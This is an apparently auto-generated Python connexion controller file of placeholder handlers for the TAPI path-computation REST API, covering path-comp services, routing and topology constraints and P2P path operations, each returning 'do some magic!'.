def data_context_path_computation_context_path_comp_serviceuuid_objective_function_namevalue_name_post(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_objective_function_namevalue_name_post
creates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_objective_function_namevalue_name_put(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_objective_function_namevalue_name_put
creates or updates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added or updated
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_objective_function_post(uuid, tapi_path_computation_path_objective_function=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_objective_function_post
creates tapi.path.computation.PathObjectiveFunction # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_path_computation_path_objective_function: tapi.path.computation.PathObjectiveFunction to be added to list
:type tapi_path_computation_path_objective_function: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_path_objective_function = TapiPathComputationPathObjectiveFunction.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_objective_function_put(uuid, tapi_path_computation_path_objective_function=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_objective_function_put
creates or updates tapi.path.computation.PathObjectiveFunction # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_path_computation_path_objective_function: tapi.path.computation.PathObjectiveFunction to be added or updated
:type tapi_path_computation_path_objective_function: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_path_objective_function = TapiPathComputationPathObjectiveFunction.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_delete(uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_delete
removes tapi.path.computation.PathOptimizationConstraint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_get(uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_get
returns tapi.path.computation.PathOptimizationConstraint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:rtype: TapiPathComputationPathOptimizationConstraint
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_name_post(uuid, tapi_common_name_and_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_name_post
creates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_namevalue_name_delete(uuid, value_name): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_namevalue_name_delete
removes tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_namevalue_name_get(uuid, value_name): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_namevalue_name_get
returns tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:rtype: TapiCommonNameAndValue
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_namevalue_name_post(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_namevalue_name_post
creates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_namevalue_name_put(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_namevalue_name_put
creates or updates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added or updated
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_post(uuid, tapi_path_computation_path_optimization_constraint=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_post
creates tapi.path.computation.PathOptimizationConstraint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_path_computation_path_optimization_constraint: tapi.path.computation.PathOptimizationConstraint to be added to list
:type tapi_path_computation_path_optimization_constraint: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_path_optimization_constraint = TapiPathComputationPathOptimizationConstraint.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_put(uuid, tapi_path_computation_path_optimization_constraint=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_put
creates or updates tapi.path.computation.PathOptimizationConstraint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_path_computation_path_optimization_constraint: tapi.path.computation.PathOptimizationConstraint to be added or updated
:type tapi_path_computation_path_optimization_constraint: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_path_optimization_constraint = TapiPathComputationPathOptimizationConstraint.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_pathpath_uuid_get(uuid, path_uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_pathpath_uuid_get
returns tapi.path.computation.PathRef # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param path_uuid: Id of path
:type path_uuid: str
:rtype: TapiPathComputationPathRef
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_post(uuid, tapi_path_computation_path_computation_service=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_post
creates tapi.path.computation.PathComputationService # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_path_computation_path_computation_service: tapi.path.computation.PathComputationService to be added to list
:type tapi_path_computation_path_computation_service: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_path_computation_service = TapiPathComputationPathComputationService.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_put(uuid, tapi_path_computation_path_computation_service=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_put
creates or updates tapi.path.computation.PathComputationService # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_path_computation_path_computation_service: tapi.path.computation.PathComputationService to be added or updated
:type tapi_path_computation_path_computation_service: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_path_computation_service = TapiPathComputationPathComputationService.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_cost_characteristic_post(uuid, tapi_topology_cost_characteristic=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_cost_characteristic_post
creates tapi.topology.CostCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_topology_cost_characteristic: tapi.topology.CostCharacteristic to be added to list
:type tapi_topology_cost_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_cost_characteristic = TapiTopologyCostCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_cost_characteristiccost_name_delete(uuid, cost_name): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_cost_characteristiccost_name_delete
removes tapi.topology.CostCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param cost_name: Id of cost-characteristic
:type cost_name: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_cost_characteristiccost_name_get(uuid, cost_name): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_cost_characteristiccost_name_get
returns tapi.topology.CostCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param cost_name: Id of cost-characteristic
:type cost_name: str
:rtype: TapiTopologyCostCharacteristic
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_cost_characteristiccost_name_post(uuid, cost_name, tapi_topology_cost_characteristic=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_cost_characteristiccost_name_post
creates tapi.topology.CostCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param cost_name: Id of cost-characteristic
:type cost_name: str
:param tapi_topology_cost_characteristic: tapi.topology.CostCharacteristic to be added to list
:type tapi_topology_cost_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_cost_characteristic = TapiTopologyCostCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_cost_characteristiccost_name_put(uuid, cost_name, tapi_topology_cost_characteristic=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_cost_characteristiccost_name_put
creates or updates tapi.topology.CostCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param cost_name: Id of cost-characteristic
:type cost_name: str
:param tapi_topology_cost_characteristic: tapi.topology.CostCharacteristic to be added or updated
:type tapi_topology_cost_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_cost_characteristic = TapiTopologyCostCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_delete(uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_delete
removes tapi.path.computation.RoutingConstraint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_get(uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_get
returns tapi.path.computation.RoutingConstraint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:rtype: TapiPathComputationRoutingConstraint
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_latency_characteristic_post(uuid, tapi_topology_latency_characteristic=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_latency_characteristic_post
creates tapi.topology.LatencyCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_topology_latency_characteristic: tapi.topology.LatencyCharacteristic to be added to list
:type tapi_topology_latency_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_latency_characteristic = TapiTopologyLatencyCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_latency_characteristictraffic_property_name_delete(uuid, traffic_property_name): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_latency_characteristictraffic_property_name_delete
removes tapi.topology.LatencyCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param traffic_property_name: Id of latency-characteristic
:type traffic_property_name: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_latency_characteristictraffic_property_name_get(uuid, traffic_property_name): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_latency_characteristictraffic_property_name_get
returns tapi.topology.LatencyCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param traffic_property_name: Id of latency-characteristic
:type traffic_property_name: str
:rtype: TapiTopologyLatencyCharacteristic
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_latency_characteristictraffic_property_name_post(uuid, traffic_property_name, tapi_topology_latency_characteristic=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_latency_characteristictraffic_property_name_post
creates tapi.topology.LatencyCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param traffic_property_name: Id of latency-characteristic
:type traffic_property_name: str
:param tapi_topology_latency_characteristic: tapi.topology.LatencyCharacteristic to be added to list
:type tapi_topology_latency_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_latency_characteristic = TapiTopologyLatencyCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_latency_characteristictraffic_property_name_put(uuid, traffic_property_name, tapi_topology_latency_characteristic=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_latency_characteristictraffic_property_name_put
creates or updates tapi.topology.LatencyCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param traffic_property_name: Id of latency-characteristic
:type traffic_property_name: str
:param tapi_topology_latency_characteristic: tapi.topology.LatencyCharacteristic to be added or updated
:type tapi_topology_latency_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_latency_characteristic = TapiTopologyLatencyCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_post(uuid, tapi_path_computation_routing_constraint=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_post
creates tapi.path.computation.RoutingConstraint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_path_computation_routing_constraint: tapi.path.computation.RoutingConstraint to be added to list
:type tapi_path_computation_routing_constraint: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_routing_constraint = TapiPathComputationRoutingConstraint.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_put(uuid, tapi_path_computation_routing_constraint=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_put
creates or updates tapi.path.computation.RoutingConstraint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_path_computation_routing_constraint: tapi.path.computation.RoutingConstraint to be added or updated
:type tapi_path_computation_routing_constraint: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_routing_constraint = TapiPathComputationRoutingConstraint.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_risk_diversity_characteristic_post(uuid, tapi_topology_risk_characteristic=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_risk_diversity_characteristic_post
creates tapi.topology.RiskCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_topology_risk_characteristic: tapi.topology.RiskCharacteristic to be added to list
:type tapi_topology_risk_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_risk_characteristic = TapiTopologyRiskCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_risk_diversity_characteristicrisk_characteristic_name_delete(uuid, risk_characteristic_name): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_risk_diversity_characteristicrisk_characteristic_name_delete
removes tapi.topology.RiskCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param risk_characteristic_name: Id of risk-diversity-characteristic
:type risk_characteristic_name: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_risk_diversity_characteristicrisk_characteristic_name_get(uuid, risk_characteristic_name): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_risk_diversity_characteristicrisk_characteristic_name_get
returns tapi.topology.RiskCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param risk_characteristic_name: Id of risk-diversity-characteristic
:type risk_characteristic_name: str
:rtype: TapiTopologyRiskCharacteristic
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_risk_diversity_characteristicrisk_characteristic_name_post(uuid, risk_characteristic_name, tapi_topology_risk_characteristic=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_risk_diversity_characteristicrisk_characteristic_name_post
creates tapi.topology.RiskCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param risk_characteristic_name: Id of risk-diversity-characteristic
:type risk_characteristic_name: str
:param tapi_topology_risk_characteristic: tapi.topology.RiskCharacteristic to be added to list
:type tapi_topology_risk_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_risk_characteristic = TapiTopologyRiskCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_risk_diversity_characteristicrisk_characteristic_name_put(uuid, risk_characteristic_name, tapi_topology_risk_characteristic=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_risk_diversity_characteristicrisk_characteristic_name_put
creates or updates tapi.topology.RiskCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param risk_characteristic_name: Id of risk-diversity-characteristic
:type risk_characteristic_name: str
:param tapi_topology_risk_characteristic: tapi.topology.RiskCharacteristic to be added or updated
:type tapi_topology_risk_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_risk_characteristic = TapiTopologyRiskCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_avoid_topologytopology_uuid_get(uuid, topology_uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_avoid_topologytopology_uuid_get
returns tapi.topology.TopologyRef # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param topology_uuid: Id of avoid-topology
:type topology_uuid: str
:rtype: TapiTopologyTopologyRef
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_delete(uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_delete
removes tapi.path.computation.TopologyConstraint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_exclude_linktopology_uuidlink_uuid_get(uuid, topology_uuid, link_uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_exclude_linktopology_uuidlink_uuid_get
returns tapi.topology.LinkRef # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param topology_uuid: Id of exclude-link
:type topology_uuid: str
:param link_uuid: Id of exclude-link
:type link_uuid: str
:rtype: TapiTopologyLinkRef
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_exclude_nodetopology_uuidnode_uuid_get(uuid, topology_uuid, node_uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_exclude_nodetopology_uuidnode_uuid_get
returns tapi.topology.NodeRef # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param topology_uuid: Id of exclude-node
:type topology_uuid: str
:param node_uuid: Id of exclude-node
:type node_uuid: str
:rtype: TapiTopologyNodeRef
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_exclude_pathpath_uuid_get(uuid, path_uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_exclude_pathpath_uuid_get
returns tapi.path.computation.PathRef # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param path_uuid: Id of exclude-path
:type path_uuid: str
:rtype: TapiPathComputationPathRef
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_get(uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_get
returns tapi.path.computation.TopologyConstraint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:rtype: TapiPathComputationTopologyConstraint
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_include_linktopology_uuidlink_uuid_get(uuid, topology_uuid, link_uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_include_linktopology_uuidlink_uuid_get
returns tapi.topology.LinkRef # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param topology_uuid: Id of include-link
:type topology_uuid: str
:param link_uuid: Id of include-link
:type link_uuid: str
:rtype: TapiTopologyLinkRef
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_include_nodetopology_uuidnode_uuid_get(uuid, topology_uuid, node_uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_include_nodetopology_uuidnode_uuid_get
returns tapi.topology.NodeRef # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param topology_uuid: Id of include-node
:type topology_uuid: str
:param node_uuid: Id of include-node
:type node_uuid: str
:rtype: TapiTopologyNodeRef
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_include_pathpath_uuid_get(uuid, path_uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_include_pathpath_uuid_get
returns tapi.path.computation.PathRef # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param path_uuid: Id of include-path
:type path_uuid: str
:rtype: TapiPathComputationPathRef
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_include_topologytopology_uuid_get(uuid, topology_uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_include_topologytopology_uuid_get
returns tapi.topology.TopologyRef # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param topology_uuid: Id of include-topology
:type topology_uuid: str
:rtype: TapiTopologyTopologyRef
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_post(uuid, tapi_path_computation_topology_constraint=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_post
creates tapi.path.computation.TopologyConstraint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_path_computation_topology_constraint: tapi.path.computation.TopologyConstraint to be added to list
:type tapi_path_computation_topology_constraint: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_topology_constraint = TapiPathComputationTopologyConstraint.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_put(uuid, tapi_path_computation_topology_constraint=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_put
creates or updates tapi.path.computation.TopologyConstraint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_path_computation_topology_constraint: tapi.path.computation.TopologyConstraint to be added or updated
:type tapi_path_computation_topology_constraint: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_topology_constraint = TapiPathComputationTopologyConstraint.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_pathuuid_get(uuid): # noqa: E501
"""data_context_path_computation_context_pathuuid_get
returns tapi.path.computation.Path # noqa: E501
:param uuid: Id of path
:type uuid: str
:rtype: TapiPathComputationPath
"""
return 'do some magic!'
def data_context_path_computation_context_pathuuid_linktopology_uuidlink_uuid_get(uuid, topology_uuid, link_uuid): # noqa: E501
"""data_context_path_computation_context_pathuuid_linktopology_uuidlink_uuid_get
returns tapi.topology.LinkRef # noqa: E501
:param uuid: Id of path
:type uuid: str
:param topology_uuid: Id of link
:type topology_uuid: str
:param link_uuid: Id of link
:type link_uuid: str
:rtype: TapiTopologyLinkRef
"""
return 'do some magic!'
def data_context_path_computation_context_pathuuid_namevalue_name_get(uuid, value_name): # noqa: E501
"""data_context_path_computation_context_pathuuid_namevalue_name_get
returns tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path
:type uuid: str
:param value_name: Id of name
:type value_name: str
:rtype: TapiCommonNameAndValue
"""
return 'do some magic!'
def data_context_path_computation_context_pathuuid_routing_constraint_cost_characteristiccost_name_get(uuid, cost_name): # noqa: E501
"""data_context_path_computation_context_pathuuid_routing_constraint_cost_characteristiccost_name_get
returns tapi.topology.CostCharacteristic # noqa: E501
:param uuid: Id of path
:type uuid: str
:param cost_name: Id of cost-characteristic
:type cost_name: str
:rtype: TapiTopologyCostCharacteristic
"""
return 'do some magic!'
def data_context_path_computation_context_pathuuid_routing_constraint_get(uuid): # noqa: E501
"""data_context_path_computation_context_pathuuid_routing_constraint_get
returns tapi.path.computation.RoutingConstraint # noqa: E501
:param uuid: Id of path
:type uuid: str
:rtype: TapiPathComputationRoutingConstraint
"""
return 'do some magic!'
def data_context_path_computation_context_pathuuid_routing_constraint_latency_characteristictraffic_property_name_get(uuid, traffic_property_name): # noqa: E501
"""data_context_path_computation_context_pathuuid_routing_constraint_latency_characteristictraffic_property_name_get
returns tapi.topology.LatencyCharacteristic # noqa: E501
:param uuid: Id of path
:type uuid: str
:param traffic_property_name: Id of latency-characteristic
:type traffic_property_name: str
:rtype: TapiTopologyLatencyCharacteristic
"""
return 'do some magic!'
def data_context_path_computation_context_pathuuid_routing_constraint_risk_diversity_characteristicrisk_characteristic_name_get(uuid, risk_characteristic_name): # noqa: E501
"""data_context_path_computation_context_pathuuid_routing_constraint_risk_diversity_characteristicrisk_characteristic_name_get
returns tapi.topology.RiskCharacteristic # noqa: E501
:param uuid: Id of path
:type uuid: str
:param risk_characteristic_name: Id of risk-diversity-characteristic
:type risk_characteristic_name: str
:rtype: TapiTopologyRiskCharacteristic
"""
return 'do some magic!'
def data_context_path_computation_context_post(tapi_path_computation_path_computation_context=None): # noqa: E501
"""data_context_path_computation_context_post
creates tapi.path.computation.PathComputationContext # noqa: E501
:param tapi_path_computation_path_computation_context: tapi.path.computation.PathComputationContext to be added to list
:type tapi_path_computation_path_computation_context: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_path_computation_context = TapiPathComputationPathComputationContext.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_put(tapi_path_computation_path_computation_context=None): # noqa: E501
"""data_context_path_computation_context_put
creates or updates tapi.path.computation.PathComputationContext # noqa: E501
:param tapi_path_computation_path_computation_context: tapi.path.computation.PathComputationContext to be added or updated
:type tapi_path_computation_path_computation_context: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_path_computation_context = TapiPathComputationPathComputationContext.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def operations_compute_p_2_p_path_post(inline_object=None): # noqa: E501
"""operations_compute_p2_p_path_post
# noqa: E501
:param inline_object:
:type inline_object: dict | bytes
:rtype: TapiPathComputationComputeP2PPath
"""
if connexion.request.is_json:
inline_object = InlineObject.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def operations_delete_p_2_p_path_post(inline_object11=None): # noqa: E501
"""operations_delete_p2_p_path_post
# noqa: E501
:param inline_object11:
:type inline_object11: dict | bytes
:rtype: TapiPathComputationDeleteP2PPath
"""
if connexion.request.is_json:
inline_object11 = InlineObject11.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def operations_optimize_p_2_p_path_post(inline_object26=None): # noqa: E501
"""operations_optimize_p2_p_path_post
# noqa: E501
:param inline_object26:
:type inline_object26: dict | bytes
:rtype: TapiPathComputationOptimizeP2PPath
"""
if connexion.request.is_json:
inline_object26 = InlineObject26.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
